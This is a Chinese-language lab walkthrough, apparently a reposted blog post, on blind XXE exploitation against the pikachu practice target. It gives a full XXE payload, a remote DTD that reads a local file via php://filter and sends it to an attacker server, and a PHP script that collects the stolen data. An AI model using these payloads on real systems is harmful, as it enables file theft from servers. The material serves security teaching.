Blind XXE 漏洞

Blind XXE 漏洞利用(无回显)

XML介绍

XML是一种非常流行的标记语言，在解析外部实体的过程中，XML解析器可以根据URL中指定的方案（协议）来查询各种网络协议和服务（DNS，FTP，HTTP，SMB等）。 外部实体对于在文档中创建动态引用非常有用，这样对引用资源所做的任何更改都会在文档中自动更新。 但是，在处理外部实体时，可以针对应用程序启动许多攻击。 这些攻击包括泄露本地系统文件，这些文件可能包含密码和私人用户数据等敏感数据，或利用各种方案的网络访问功能来操纵内部应用程序。 通过将这些攻击与其他实现缺陷相结合，这些攻击的范围可以扩展到客户端内存损坏，任意代码执行，甚至服务中断，具体取决于这些攻击的上下文。

有回显的情况可以直接在页面中看到Payload的执行结果或现象，无回显的情况又称为blind xxe，可以使用外带数据通道提取数据

测试目标

无回显XXE漏洞读取靶机C盘下的1.txt文件并外带到攻击机服务器的1.txt中

测试步骤

攻击机：192.168.0.104
靶机：192.168.0.101 (pikachu-labs xxe)

XXE Payload

<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://192.168.0.104/test.dtd">
%remote;%int;%send;
]>

攻击机上的test.dtd

<!ENTITY % file SYSTEM
"php://filter/read=convert.base64-encode/resource=file:///C:/1.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://192.168.0.104/1.php?file=%file;'>">

blind xxe使用外带数据通道提取数据，先使用php://filter获取目标文件的内容，然后将内容以http请求发送到接受数据的服务器

攻击机上的 1.php

<?php
file_put_contents("1.txt", $_GET['file']) ;
?>

使用pikachu的xxe靶场，提交payload

此时攻击机的access.log收到http请求

攻击机的网站根目录中创建了1.txt，文本内容为base64编码后的

这篇好文章是转载于：学新通技术网